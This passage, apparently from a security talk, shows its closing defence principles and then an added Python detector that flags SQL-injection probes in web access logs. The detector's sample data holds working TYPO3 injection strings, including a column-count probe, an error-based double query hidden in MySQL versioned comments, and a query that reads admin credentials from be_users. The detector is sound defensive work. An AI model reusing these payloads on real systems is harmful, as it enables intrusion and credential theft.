    <#2> Try to understand their goals and the capabilities they have, but above all the operational constraints they work under
    <#3> Identify the «perceived» value of what you want to defend, and above all what it is you want to defend
    <#4> Work on the whole defensive perimeter, with no leaps of faith
    <#5> If your defence is cheaper than the attack, you will always be ahead
  • 36. Questions? (Italian: Domande? / Arabic: أية مطالب / Spanish: ¿Preguntas? / English: Questions? / Klingon: tupoQghachmey / Sindarin / Japanese / Greek: Ερωτήσεις? / Russian: вопросы?)
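The access-log lines on slides 27 and 28 show a TYPO3 parameter (`tx_wfqbe_pi1[uid]`) being probed with an `ORDER BY` column-count test, then an error-based "double query" built on `floor(rand(0)*2) ... group by`, with the keywords of the second request wrapped in MySQL `/*! ... */` versioned comments so that a naive signature does not see `select ... from` as plain tokens. The detector below, written for this page as an added example (it is not code from the talk or from any product), is what a defender would run over such a log from the two IPS boxes of slide 3: it decodes the URI, resolves the versioned comments the way MySQL itself would, and then applies keyword patterns. The first three sample lines are the slide's own entries; the fourth benign line and the indicator names are constructed for the example.

```python
"""Flag SQL-injection probes in web-server access-log lines.

Added example, not code from the original slides. The three attack lines
are the excerpts from slides 27 and 28; the benign fourth line and the
indicator names are constructed for this example.
"""
import re
from urllib.parse import unquote_plus

# Apache common/combined log prefix: client, identd, user, [timestamp], "METHOD URI ...".
# The URI stops at the first whitespace or quote, which also copes with
# truncated entries that lack the trailing " HTTP/1.x" token.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>[^"\s]+)'
)

# MySQL executes the body of a /*! ... */ "versioned" comment, so the wrapper is
# removed before keyword patterns run; otherwise /*!select*/ and
# /*!information_schema*/ never appear as whole tokens.
VERSIONED_COMMENT_RE = re.compile(r'/\*!\s*(.*?)\s*\*/', re.S)

# (indicator name, pattern applied to the normalised query string)
INDICATORS = [
    ("column-count probe (ORDER BY n)", re.compile(r'\border\s+by\s+\d{2,}')),
    ("information_schema access", re.compile(r'\binformation_schema\b')),
    ("error-based double query",
     re.compile(r'floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?\bgroup\s+by\b')),
    ("server fingerprint functions", re.compile(r'\b(?:user|version|database)\s*\(\s*\)')),
    ("credential table read", re.compile(r'\bfrom\s+be_users\b')),   # TYPO3 backend users
    ("SQL comment terminator", re.compile(r'--\s*$')),
]

SAMPLE_LOG_LINES = [
    '173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"',
    '178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/(/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+"',
    '89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"',
    # constructed benign request for contrast
    '10.0.0.5 - - [13/Nov/2012:20:04:01 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=17 HTTP/1.1" 200 5120',
]


def normalise(uri):
    """Decoded, lower-cased query string with MySQL /*!...*/ wrappers resolved."""
    query = uri.partition('?')[2]
    decoded = unquote_plus(query)                       # %xx and '+' -> literal characters
    decoded = VERSIONED_COMMENT_RE.sub(r'\1', decoded)  # keep the body, drop the wrapper
    return re.sub(r'\s+', ' ', decoded).lower()


def find_indicators(normalised_query):
    """Names of every indicator whose pattern matches, in INDICATORS order."""
    return [name for name, pattern in INDICATORS if pattern.search(normalised_query)]


def scan(lines):
    """Parse each access-log line and return client, timestamp and matched indicators."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an entry we understand; skip rather than guess
        indicators = find_indicators(normalise(m.group('uri')))
        results.append({"client": m.group('client'), "ts": m.group('ts'),
                        "indicators": indicators})
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG_LINES):
        print(r["client"], r["ts"], "->", ", ".join(r["indicators"]) or "clean")
```

Two lines from the same client hitting several indicators within seconds (column-count probe followed by a `group by`/`floor(rand(0)*2)` query) is the sequence worth alerting on, rather than any single keyword; the normalisation step is what keeps the `information_schema` indicator firing on the slide 27 request, where the table name is itself hidden inside a versioned comment.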